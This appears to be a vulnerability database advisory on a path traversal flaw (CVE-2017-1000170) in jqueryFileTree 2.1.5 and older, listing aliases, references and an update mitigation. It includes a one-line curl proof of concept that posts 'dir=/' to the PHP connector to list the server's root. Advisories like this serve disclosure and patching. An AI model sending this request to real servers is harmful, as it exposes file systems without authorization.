logo

Database

Lack of data validation - Path Traversal In jqueryfiletree

Description

jqueryFileTree vulnerable to Directory Traversal jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal

POC:

curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version

Aliases

1. CVE-2017-10001702. NVD-2017-10001703. OSV-2017-10001704. GCVE-2017-1000170

References

1. https://github.com/jqueryfiletree/jqueryfiletree/issues/662. http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html3. https://vulncheck.com/cve/CVE-2017-10001704. https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000170.yaml5. https://github.com/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.